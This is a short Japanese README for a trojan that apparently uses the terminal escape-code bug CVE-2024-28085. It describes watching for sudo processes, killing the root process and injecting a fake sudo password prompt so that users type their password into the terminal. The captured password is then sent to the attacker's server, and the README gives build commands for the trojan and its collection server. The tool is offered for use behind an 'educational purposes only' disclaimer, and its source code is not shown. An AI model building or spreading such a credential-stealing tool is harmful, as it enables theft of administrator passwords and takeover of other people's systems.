
トロイの木馬 CVE-2024-28085 CVE 28085
CVE-2024-28085 (https://people.rit.edu/sjf5462/6831711781/wall_2_27_2024.txt) のバグに基づくトロイの木馬で、まだどこでも修正されていません。要点: bash はエスケープコードをサポートしているため、ターミナル内の文字列の表示を制御できます。このトロイの木馬はプロセスを監視して sudo コマンドの pid を探し、その親を特定してルートプロセスを強制終了させ、偽の SUDO プロンプト文字列を差し込みます。
ユーザーがターミナルで sudo <...> コマンドを実行すると、トロイの木馬がそのプロセスを改変し、パスワードを sudo ではなくターミナルに入力させます。その後、パスワードはサーバーへ送信されます。
このコードはテストと学習目的で作成されたものであり、作者はその後のあなたの行動について一切責任を負いません。
Build:
g++ -static sleepall.cpp -o sleepall
gcc server.c -o server
偽のプロンプトの画像:
ターミナルで実際に起きていることの画像:
ユーザーによるプロセス制御が許可されている環境:
禁止されている環境:
P.S.: うぃーーー、でも bash でのみ動作します (zsh では動作しません)